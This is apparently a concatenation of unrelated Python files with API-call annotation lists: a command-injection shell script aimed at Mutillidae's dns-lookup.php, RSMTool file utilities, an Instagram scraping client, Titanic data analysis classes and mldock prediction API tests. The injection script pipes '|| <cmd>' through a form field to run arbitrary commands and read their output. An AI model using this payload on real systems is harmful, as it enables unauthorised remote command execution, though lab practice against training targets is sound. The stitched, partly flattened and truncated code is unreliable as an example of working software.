] | [((70, 116), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [1, 2, 3], 'b': [4, 5, 6]}"], {}), "({'a': [1, 2, 3], 'b': [4, 5, 6]})\n", (82, 116), True, 'import pandas as pd\n'), ((143, 153), 'my_mod.enlarge', 'enlarge', (['x'], {}), '(x)\n', (150, 153), False, 'from my_mod import enlarge\n')] |
#-*-coding: utf-8-*-
from requests import session
from bs4 import BeautifulSoup
#Aqui pones la ip de tu maquina.
host = "192.168.1.167"
#Aqui pones la ruta de el dns-lookup.php
route = "/mutillidae/index.php?page=dns-lookup.php"
with session() as s:
cmd = ''
while cmd != 'exit':
cmd = input(">>")
payload = "|| {}".format(cmd)
#Mandar el payload al host por medio de un post request.
response = s.post("http://{}{}".format(host, route), data={"target_host": payload})
#Parsear la respuesta con beautiful soup
soup = BeautifulSoup(response.text, "html.parser")
#El output del comando se encuentra en un <pre> con la clase 'report-header'
#Asi que le decimos a beautiful soup que lo encuentre, y que nos de el texto.
command_output = soup.find_all("pre", attrs={"class": "report-header"})[0].get_text()
#Imprimir output del comando
print(command_output) | [
"bs4.BeautifulSoup",
"requests.session"
] | [((238, 247), 'requests.session', 'session', ([], {}), '()\n', (245, 247), False, 'from requests import session\n'), ((538, 581), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (551, 581), False, 'from bs4 import BeautifulSoup\n')] |
"""
Utility classes and functions for RSMTool file management.
:author: <NAME> (<EMAIL>)
:author: <NAME> (<EMAIL>)
:author: <NAME> (<EMAIL>)
:organization: ETS
"""
import json
import re
from glob import glob
from pathlib import Path
from os.path import join
from .constants import POSSIBLE_EXTENSIONS
def parse_json_with_comments(pathlike):
"""
Parse a JSON file after removing any comments.
Comments can use either ``//`` for single-line
comments or or ``/* ... */`` for multi-line comments.
The input filepath can be a string or ``pathlib.Path``.
Parameters
----------
filename : str or os.PathLike
Path to the input JSON file either as a string
or as a ``pathlib.Path`` object.
Returns
-------
obj : dict
JSON object representing the input file.
Note
----
This code was adapted from:
https://web.archive.org/web/20150520154859/http://www.lifl.fr/~riquetd/parse-a-json-file-with-comments.html
"""
# Regular expression to identify comments
comment_re = re.compile(r'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE)
# if we passed in a string, convert it to a Path
if isinstance(pathlike, str):
pathlike = Path(pathlike)
with open(pathlike, 'r') as file_buff:
content = ''.join(file_buff.readlines())
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
# Return JSON object
config = json.loads(content)
return config
def has_files_with_extension(directory, ext):
"""
Check if the directory has any files with the given extension.
Parameters
----------
directory : str
The path to the directory where output is located.
ext : str
The the given extension.
Returns
-------
bool
True if directory contains files with given extension,
else False.
"""
files_with_extension = glob(join(directory, '*.{}'.format(ext)))
return len(files_with_extension) > 0
def get_output_directory_extension(directory, experiment_id):
"""
Check the output directory to determine what file extensions
exist. If more than one extension (in the possible list of
extensions) exists, then raise a ValueError. Otherwise,
return the one file extension. If no extensions can be found, then
`csv` will be returned by default.
Possible extensions include: `csv`, `tsv`, `xlsx`. Files in the
directory with none of these extensions will be ignored.
Parameters
----------
directory : str
The path to the directory where output is located.
experiment_id : str
The ID of the experiment.
Returns
-------
extension : {'csv', 'tsv', 'xlsx'}
The extension that output files in this directory
end with.
Raises
------
ValueError
If any files in the directory have different extensions,
and are in the list of possible output extensions.
"""
extension = 'csv'
extensions_identified = {ext for ext in POSSIBLE_EXTENSIONS
if has_files_with_extension(directory, ext)}
if len(extensions_identified) > 1:
raise ValueError('Some of the files in the experiment output directory (`{}`) '
'for `{}` have different extensions. All files in this directory '
'must have the same extension. The following extensions were '
'identified : {}'.format(directory,
experiment_id,
', '.join(extensions_identified)))
elif len(extensions_identified) == 1:
extension = list(extensions_identified)[0]
return extension
| [
"json.loads",
"pathlib.Path",
"re.compile"
] | [((1062, 1161), 're.compile', 're.compile', (['"""(^)?[^\\\\S\\\\n]*/(?:\\\\*(.*?)\\\\*/[^\\\\S\\\\n]*|/[^\\\\n]*)($)?"""', '(re.DOTALL | re.MULTILINE)'], {}), "('(^)?[^\\\\S\\\\n]*/(?:\\\\*(.*?)\\\\*/[^\\\\S\\\\n]*|/[^\\\\n]*)($)?', re.\n DOTALL | re.MULTILINE)\n", (1072, 1161), False, 'import re\n'), ((1286, 1300), 'pathlib.Path', 'Path', (['pathlike'], {}), '(pathlike)\n', (1290, 1300), False, 'from pathlib import Path\n'), ((1689, 1708), 'json.loads', 'json.loads', (['content'], {}), '(content)\n', (1699, 1708), False, 'import json\n')] |
import random
def go_to_sleep(text):
replies = ['See you later!', 'Just call my name and I\'ll be there!']
return (random.choice(replies))
quit()
| [
"random.choice"
] | [((125, 147), 'random.choice', 'random.choice', (['replies'], {}), '(replies)\n', (138, 147), False, 'import random\n')] |
import logging
from django.contrib.messages import get_messages
from django.utils.encoding import force_str
logger = logging.getLogger('django_sso_app')
def get_request_messages_string(request):
"""
Serializes django messages
:param request:
:return:
"""
storage = get_messages(request)
_messages = []
for message in storage:
_messages.append(force_str(message))
return ', '.join(_messages)
| [
"logging.getLogger",
"django.contrib.messages.get_messages",
"django.utils.encoding.force_str"
] | [((119, 154), 'logging.getLogger', 'logging.getLogger', (['"""django_sso_app"""'], {}), "('django_sso_app')\n", (136, 154), False, 'import logging\n'), ((294, 315), 'django.contrib.messages.get_messages', 'get_messages', (['request'], {}), '(request)\n', (306, 315), False, 'from django.contrib.messages import get_messages\n'), ((388, 406), 'django.utils.encoding.force_str', 'force_str', (['message'], {}), '(message)\n', (397, 406), False, 'from django.utils.encoding import force_str\n')] |
"""
This module contains functions related to integer formatting and math.
"""
from functools import reduce
from itertools import count
from math import gcd, prod
# ================ ARRAY FORMATTING FUNCTIONS ================
def str_array_to_int(intarray):
return int(''.join(intarray))
def int_array_to_int(intarray):
return str_array_to_int(map(str, intarray))
def int_to_int_array(num):
"""
Deprecated, use int_to_digit_array(num)
"""
return [int(str(num)[a]) for a in range(len(str(num)))]
def int_to_str_array(num):
return [str(num)[a] for a in range(len(str(num)))]
def int_to_digit_array(num):
return [int(str(num)[a]) for a in range(len(str(num)))]
# ================ CALCULATION FUNCTIONS ================
def product(numlist):
"""
Deprecated since Python 3.8, use math.prod instead
Also remove functools.reduce
"""
return reduce(lambda x, y: x * y, numlist, 1)
def factorial(num):
return prod(list(range(1, num + 1)))
def nCr(n, r):
return int(prod(range(n-r+1, n+1)) / prod(range(1, r+1)))
def phi(n):
"""
Returns the value of ϕ(n), or the Euler Totient function.
"""
return len([x for x in range(1, n) if gcd(n, x) == 1])
# ================ COUNTING FUNCTIONS ================
def counting_summations(values, target):
"""
Returns the number of ways to write target as the sum of numbers in values.
"""
csums = [[0 for _ in values]]
while len(csums) <= target:
tempsum = [0 for _ in values]
for a in range(len(values)):
if values[a] > len(csums):
break
elif values[a] == len(csums):
tempsum[a] = 1
else:
tempsum[a] += sum(csums[len(csums) - values[a]][:a+1])
csums.append(tempsum)
return sum(csums[target])
def partition():
"""
Calculates the partition function using Euler's method.
Much faster than the above function.
"""
yield 1
p = [1]
for i in count(1):
new_p = 0
for j in count(1):
# move i
if j % 2 == 0:
i -= j // 2
else:
i -= j
if i < 0:
break
# add to new_p
if (j - 1) % 4 < 2:
new_p += p[i]
else:
new_p -= p[i]
p.append(new_p)
yield new_p
| [
"functools.reduce",
"math.gcd",
"itertools.count"
] | [((900, 938), 'functools.reduce', 'reduce', (['(lambda x, y: x * y)', 'numlist', '(1)'], {}), '(lambda x, y: x * y, numlist, 1)\n', (906, 938), False, 'from functools import reduce\n'), ((2024, 2032), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (2029, 2032), False, 'from itertools import count\n'), ((2069, 2077), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (2074, 2077), False, 'from itertools import count\n'), ((1215, 1224), 'math.gcd', 'gcd', (['n', 'x'], {}), '(n, x)\n', (1218, 1224), False, 'from math import gcd, prod\n')] |
# -*- coding: utf-8 -*-
import random
from datetime import datetime
from operator import itemgetter
import requests
import time
from pyinstagram.model import Media
from .exceptions import OAuthException, PyInstagramException
from .oauth import OAuth
from .constants import API_URL
from .utils import DESAdapter
class InstagramApiClient(object):
"""
Classe base per le chiamate all'API ufficiale!
"""
def __init__(self, access_token=None):
self.access_token = access_token
if isinstance(access_token, OAuth):
self.access_token = access_token.access_token
if not self.access_token:
# TODO: Gestire il caso in cui l'access token scada
raise OAuthException("Per usare la libreria devi prima autenticarti!")
@staticmethod
def go_to_sleep(seconds=3600):
"""
Questo metodo viene chiamato quando è stato raggiunto il
limite consentito dall'API, se succede metto in pausa il
programma per un'ora.
:param seconds: int - Numero di secondi di attesa
:return: None
"""
time.sleep(seconds)
def _make_request(self, uri, method='get', data=None):
"""
Metodo che effettua la richiesta alle API Instagram.
:param uri: str - L'Uri da chiamare
:param method: str - metodo http con cui fare la richiesta
:param data: dict - dizionario con i dati da passare nella richiesta
:return: list - lista di dati di risposta
"""
next_url = "" # per la paginazione
res = []
retry = 1 # serve per ripetere la chiamata dopo un ora se supero il limite di richieste
while retry:
res = getattr(requests, method)(uri, data=data)
res, next_url = self._handle_response(res)
if res == 0:
# la chiamata non è andata a buon fine perchè ho raggiunto il limite di chiamate
# ho già aspettato un'ora, adesso ci riprovo.
continue
retry = 0
return res, next_url
def _handle_response(self, request):
"""
Una volta effettuata la chiamata, ci occupiamo di
interpretarne la risposta.
Se la richiesta è andata a buon fine, restituiamo la
lista dei dati, altrimenti o mettiamo in pausa il
programma (se abbiamo raggiunto il limite dell'API)
o solleviamo un'eccezione appropriata.
:param request: requests - la risposta della chiamata
:return: list - lista dei dati ricevuti
"""
if request.status_code == 200:
# Tutto ok!
try:
res = request.json()
except Exception:
raise Exception(request.text)
else:
data = res['data']
next_url = res.get('pagination', {}).get('next_url')
return data, next_url
elif request.status_code == 429:
# OAuthRateLimitException
self.go_to_sleep()
return 0
elif request.status_code == 400:
raise OAuthException(request.json()['meta']['error_message'])
elif "<!DOCTYPE html>" in request.text:
raise PyInstagramException("Page not found")
else:
raise PyInstagramException
def get_by_user(self, id_user=None, count=0):
"""
Metodo usato per cercare gli ultimi post di un utente.
Se non viene passato il paramentro id_user, chiederemo
i post dell'utente che ha autorizzato l'app.
:param id_user: str - post dell'utente da cercare
:param count: int - limita a {count} risultati
:return: list - lista dati
"""
all_media = []
id_user = id_user or "self"
url = API_URL + "users/{0}/media/recent/?access_token={1}".format(id_user, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
if len(all_media) > count:
return all_media[:count]
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media[:count]
def get_by_hashtag(self, tags=(), count=0):
"""
Metodo usato per cercare i post con uno o più hashtag.
:param tags: iterable - gli hashtag da cercare
:param count: int - massimo numero di risultati da restituire
:return: list - lista di dati
"""
if isinstance(tags, str):
tags = (tags, )
all_media = []
for tag in tags:
url = API_URL + "tags/{0}/media/recent?access_token={1}".format(tag, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media
def search_for_tag(self, tag, count=3):
"""
Metodo usato per cercare hashtag simili a un altro.
:param tag: str - hashtag da cercare
:param count: int - limita a un numero di hashtag
:return: dict
"""
url = API_URL + "tags/search?q={0}&access_token={1}".format(tag, self.access_token)
res, _ = self._make_request(url)
res = sorted(res, key=itemgetter('media_count'))
names = {r['name']: r['media_count'] for r in res[:count]}
return names
class InstagramJsonClient(object):
"""
Classe per fare semplici richieste in get senza usare access token
o le API ufficiali. Fa largo uso di url con query string.
"""
def __init__(self):
self.base_url = "https://www.instagram.com/"
self.session = self._init_session()
def _init_session(self):
"""Abilita il supporto 3DES su Instagram"""
s = requests.Session()
s.mount(self.base_url, DESAdapter())
return s
def get_user_info(self, user):
"""
Ritorna le informazioni di un utente
:param user: username Instagram
:return: dizionario con le info dell'utente
"""
base_url = "{base}{user}/?__a=1".format(
base=self.base_url,
user=user
)
res = self.session.get(base_url)
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(base_url))
return res.get('user', {})
def get_by_user(self, user, count=None, since=None, until=None):
"""
Ricerca post (pubblici) di un utente.
Gestisce automaticamente la paginazione.
Ritorna una lista di dizionari così composta:
[
{
id: "1606977067425770236_528817151",
code: "BZNISDyHKr8",
user: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
},
images: {
thumbnail: {
width: 150,
height: 150,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
low_resolution: {
width: 320,
height: 320,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s640x640/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
}
},
created_time: "1505786616",
caption: {
id: "17887172635109592",
text: "Look up in the sky tonight and see Saturn! This month Saturn is the only prominent evening planet low in the southwest sky. Look for it near the constellation Sagittarius. Above and below Saturn--from a dark sky--you can't miss the summer Milky Way spanning the sky from northeast to southwest! Grab a pair of binoculars and scan the teapot-shaped Sagittarius, where stars and some brighter clumps appear as steam from the teapot. Those bright clumps are near the center of our galaxy, which is full of gas, dust and stars. Credit: NASA #nasa #space #astronomy #september #whatsup #night #nightsky #stars #stargazing #saturn #planet",
created_time: "1505786616",
from: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
}
},
user_has_liked: false,
likes: {
data: [
{
id: "4010977557",
full_name: "Natalia",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/14482183_140565769737733_5249004653428867072_a.jpg",
username: "nata.barata"
},
{
id: "2055640911",
full_name: "<NAME>○cq ♡☆♡",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/13534211_1557747037863158_1773299287_a.jpg",
username: "melsab19"
},
{
id: "752521983",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10624147_809215025765686_985825156_a.jpg",
username: "lauriwushu"
},
{
id: "1719376530",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10985984_1575721159312127_239135761_a.jpg",
username: "julia_paniti"
}
],
count: 204038
},
comments: {
data: [
{
id: "17876620534138631",
text: "@jennytried ❤️",
created_time: "1505855823",
from: {
id: "4610349",
full_name: "",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10932285_747424172021124_1089839988_a.jpg",
username: "siskascherz"
}
},
{
id: "17899664473040297",
text: "@a.hm.ed.1",
created_time: "1505855825",
from: {
id: "416900232",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/16907969_415736022127336_8841431139366207488_a.jpg",
username: "maariam_bk"
}
},
{
id: "17871962107174729",
text: "Wonderful 😍",
created_time: "1505855872",
from: {
id: "2982243595",
full_name: "<NAME>",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/21690360_117321958944805_772082897589895168_n.jpg",
username: "smit_raj_"
}
}
],
count: 1564
},
can_view_comments: true,
can_delete_comments: false,
type: "video",
link: "https://www.instagram.com/p/BZNISDyHKr8/",
location: null,
alt_media_url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4",
videos: {
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4"
},
low_bandwidth: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
},
low_resolution: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
}
},
video_views: 1012473
},
]
:param user: str - username Instagram
:param count: int - limita il numero di risultati
:param since: str - Risultati a partire da questa data, es. "20170101000000"
:param until: str - Risultati entro questa data, es. "20171231235959"
:return:
"""
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
all_data = []
base_url = "{base}{user}?__a=1{{max}}".format(
base=self.base_url,
user=user
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
if not res.status_code == 200:
return all_data[:count]
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
for media_res in res['user']['media']['nodes']:
# Instagram non mi permette di cercare per data, però mi fornisce la
# data di creazione del post in formato Unix Timestamp. Quindi, per
# gestire il caso in cui volessi solo risultati in un certo intervallo,
# verifico che il mio post sia stato creato in questo lasso di tempo.
created_at = int(media_res['date'])
if since and created_at < time.mktime(since.timetuple()):
# sono andato troppo indietro, posso uscire
return all_data[:count]
if until and created_at > time.mktime(until.timetuple()):
continue
all_data.append(media_res)
if res['user']['media']['nodes'] and (not len(all_data) > count if count else True):
# ho oggetti, ne ho altri da scaricare, e non ho raggiunto il limite di risultati
try:
max_id = res['user']['media']['nodes'][-1]['id']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
# aspetto un po', index è vuoto e Instagram mi blocca il flusso
time.sleep(random.randint(10, 60))
else:
# tutto ok, ho altri dati da scaricare
continue
else:
# non ho dati, oppure ne ho di più di quelli voluti
break
return all_data[:count]
def get_by_hashtag(self, tags=(), count=1000000, top_posts=True, since=None, until=None):
"""
Ricerca per hashtag.
Gestisce automaticamente la paginazione.
Ritorna una lista di oggetti SqlAlchemy a partire da
una lista di dizionari fatti come segue:
[
{
comments_disabled: false,
id: "1607551655901147333",
dimensions: {
height: 640,
width: 640
},
owner: {
id: "981246989"
},
thumbnail_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
thumbnail_resources: [
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 150,
config_height: 150
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s240x240/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 240,
config_height: 240
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 320,
config_height: 320
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s480x480/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 480,
config_height: 480
}
],
is_video: false,
code: "BZPK7bAFDDF",
date: 1505855112,
display_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
caption: "<NAME> London Fashion Week Spring_Summer 2018 @londonfashionweek @britishfashioncouncil @tommyhilfiger #londonfashionweek#LFW#fashion#paris#fashionblogger#tehran#fashioneditor#fashionweek#style#streetstyle##milan#london#newyork#mfw#lfw#nyfw#vogue#gq#art#love#fashionshow#blogger#life#event#ss2018#instafashion#runway#fashionmoment0#TOMMYNOW",
comments: {
count: 1
},
likes: {
count: 24
}
},
]
:param tags: str or tuple - hashtag (senza il #) o tupla di hastag
:param count: int - limita i risultati
:param top_posts: bool - limita ai top posts altrimenti ritorna tutto
:param since: str - Risultati a partire da questa data, es. "20170101000000"
:param until: str - Risultati entro questa data, es. "20171231235959"
:return: list - lista di dizionari
"""
if isinstance(tags, str):
tags = (tags, )
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
mapper = {
'id': 'id',
'comments': 'edge_media_to_comment.count',
'unix_datetime': 'taken_at_timestamp',
'user': 'owner.id',
'likes': 'edge_liked_by.count',
'is_video': 'is_video',
'url': 'display_src',
'height': 'dimensions.height',
'width': 'dimensions.width',
'code': 'shortcode'
}
all_data = []
for tag in tags:
all_data_tag = []
base_url = "{base}explore/tags/{tag}?__a=1{{max}}".format(
base=self.base_url,
tag=tag
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
# Post rimosso o non più raggiungibile
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
res_media = res['graphql']['hashtag']['edge_hashtag_to_top_posts'] if top_posts else res['graphql']['hashtag']['edge_hashtag_to_media']
has_next_page = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['has_next_page']
# converto in oggetti SqlAlchemy
sqlalchemy_media = []
for element in res_media['edges']:
# Instagram non mi permette di cercare per data, però mi fornisce la
# data di creazione del post in formato Unix Timestamp. Quindi, per
# gestire il caso in cui volessi solo risultati in un certo intervallo,
# verifico che il mio post sia stato creato in questo lasso di tempo.
created_at = int(element['node']['taken_at_timestamp'])
if since and created_at < time.mktime(since.timetuple()):
# sono andato troppo indietro, posso uscire
break
if until and created_at > time.mktime(until.timetuple()):
continue
model = Media()
for field_to, getter in mapper.items():
path = getter.split('.')
val = element['node']
for key in path:
val = val.get(key, {})
if isinstance(val, dict):
val = None
setattr(model, field_to, val)
model.json = element['node']
model.caption = element['node']['edge_media_to_caption']['edges'][0]['node']['text']
sqlalchemy_media.append(model)
all_data_tag.extend(sqlalchemy_media)
if res_media['edges'] and has_next_page and not len(all_data_tag) > count and not top_posts:
try:
max_id = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
# aspetto un po', index è vuoto e Instagram mi blocca il flusso
time.sleep(random.randint(10, 60))
else:
# tutto ok, ho altri dati da scaricare
continue
else:
# non ho dati, oppure ne ho di più di quelli voluti
break
all_data.extend(all_data_tag)
return all_data[:count]
def get_by_media_codes(self, codes=(), all_comments=False):
"""
Restituisce una lista contenente i dati dei post richiesti
(identificati dalla stringa 'code' del post). Attivando
il flag all_comments, verranno fatte ulteriori richieste
gestendo la paginazione dei commenti. I commenti verranno
aggiunti al json originale in modo da avere alla fina una
lista composta da tanti elementi quanti sono i post
richiesti.
:param codes: stringa del codice o tupla con i codici dei post
:param all_comments: bool - se attivato, scarica tutti i commenti
:return: lista di json con i dati dei post richiesti
"""
if isinstance(codes, str):
codes = (codes,)
all_data = []
for code in codes:
url = "{base}p/{code}?__a=1".format(
base=self.base_url,
code=code
)
res = self.session.get(url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
# Post rimosso o non più raggiungibile
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(url))
if all_comments:
while True:
page_info = res['graphql']['shortcode_media']['edge_media_to_comment']['page_info']
if page_info['has_next_page']:
next_url = url + "&max_id={}".format(page_info['end_cursor'])
next_res = self.session.get(next_url)
next_res = next_res.json()
res_edges = res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
next_edges = next_res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
res_edges.extend(next_edges)
else:
break
all_data.append(res)
return all_data
| [
"requests.Session",
"datetime.datetime.strptime",
"time.sleep",
"operator.itemgetter",
"pyinstagram.model.Media",
"random.randint"
] | [((1110, 1129), 'time.sleep', 'time.sleep', (['seconds'], {}), '(seconds)\n', (1120, 1129), False, 'import time\n'), ((6041, 6059), 'requests.Session', 'requests.Session', ([], {}), '()\n', (6057, 6059), False, 'import requests\n'), ((5525, 5550), 'operator.itemgetter', 'itemgetter', (['"""media_count"""'], {}), "('media_count')\n", (5535, 5550), False, 'from operator import itemgetter\n'), ((14462, 14502), 'datetime.datetime.strptime', 'datetime.strptime', (['since', '"""%Y%m%d%H%M%S"""'], {}), "(since, '%Y%m%d%H%M%S')\n", (14479, 14502), False, 'from datetime import datetime\n'), ((14701, 14741), 'datetime.datetime.strptime', 'datetime.strptime', (['until', '"""%Y%m%d%H%M%S"""'], {}), "(until, '%Y%m%d%H%M%S')\n", (14718, 14741), False, 'from datetime import datetime\n'), ((20250, 20290), 'datetime.datetime.strptime', 'datetime.strptime', (['since', '"""%Y%m%d%H%M%S"""'], {}), "(since, '%Y%m%d%H%M%S')\n", (20267, 20290), False, 'from datetime import datetime\n'), ((20489, 20529), 'datetime.datetime.strptime', 'datetime.strptime', (['until', '"""%Y%m%d%H%M%S"""'], {}), "(until, '%Y%m%d%H%M%S')\n", (20506, 20529), False, 'from datetime import datetime\n'), ((23022, 23029), 'pyinstagram.model.Media', 'Media', ([], {}), '()\n', (23027, 23029), False, 'from pyinstagram.model import Media\n'), ((16730, 16752), 'random.randint', 'random.randint', (['(10)', '(60)'], {}), '(10, 60)\n', (16744, 16752), False, 'import random\n'), ((24171, 24193), 'random.randint', 'random.randint', (['(10)', '(60)'], {}), '(10, 60)\n', (24185, 24193), False, 'import random\n')] |
import ImportTitanicData
import DataPreparation
# analiza danych przed preparacją danych
class DataAnaliysisBefore():
def showTrain(self):
importData = ImportTitanicData.DataImport()
train = importData.importTrain()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
importData = ImportTitanicData.DataImport()
test = importData.importTest()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
# analiza danych po preparacji danych
class DataAnaliysisAfter():
def showTrain(self):
dataPreparation = DataPreparation.DataPreparation()
train = dataPreparation.prepareTrainData()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
dataPreparation = DataPreparation.DataPreparation()
test = dataPreparation.prepareTestData()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
#
#
# def showTest(self):
# test = ImportTitanicData.DataImport.importTest()
# return test.head()
# def showTest ()
# dataAnaysis = DataAnaliysisBefore()
dataAnaysis = DataAnaliysisAfter()
# print('czesio')
# print('Analiza danych przed wypełnieniem NaN')
# print('Tabela Train\n', dataAnaysis.showTrain())
# print('\n\nshape Train\n', dataAnaysis.shapeTrain())
# print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
print('Analiza danych po wypełnieniem NaN i preparacji danych')
print('Tabela Train\n', dataAnaysis.showTrain())
print('\n\nshape Train\n', dataAnaysis.shapeTrain())
print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
# dataPreparation = DataPreparation.DataPreparation()
# print(dataPreparation.prepareTrainData().to_string())
| [
"ImportTitanicData.DataImport",
"DataPreparation.DataPreparation"
] | [((165, 195), 'ImportTitanicData.DataImport', 'ImportTitanicData.DataImport', ([], {}), '()\n', (193, 195), False, 'import ImportTitanicData\n'), ((436, 466), 'ImportTitanicData.DataImport', 'ImportTitanicData.DataImport', ([], {}), '()\n', (464, 466), False, 'import ImportTitanicData\n'), ((772, 805), 'DataPreparation.DataPreparation', 'DataPreparation.DataPreparation', ([], {}), '()\n', (803, 805), False, 'import DataPreparation\n'), ((1061, 1094), 'DataPreparation.DataPreparation', 'DataPreparation.DataPreparation', ([], {}), '()\n', (1092, 1094), False, 'import DataPreparation\n')] |
"""Test Predict API calls"""
import io
from PIL import Image
from dataclasses import dataclass
import tempfile
from pathlib import Path
import pytest
from mock import patch
from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction
import responses
import requests
@pytest.fixture
def image_bytes():
"""reads image as bytes string"""
img = Image.open("tests/api/fixtures/eight.png", mode="r")
img_byte_arr = io.BytesIO()
img.save(img_byte_arr, format="PNG")
return img_byte_arr.getvalue()
@dataclass
class MockResponse:
status_code: int
json_data: dict = None
text: str = None
_content: bytes = None
def json(self):
return self.json_data
class TestPredictAPI:
"""
TEST ERROR STATUS_CODE!=200 SCENERIO
"""
@staticmethod
@responses.activate
def test_handle_prediction_send_json_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
)
@staticmethod
@responses.activate
def test_handle_prediction_sending_image_jpeg_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=None,
request_content_type="image/jpeg",
response_content_type="application/json",
)
@staticmethod
@responses.activate
def test_handle_prediction_sending_text_csv_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
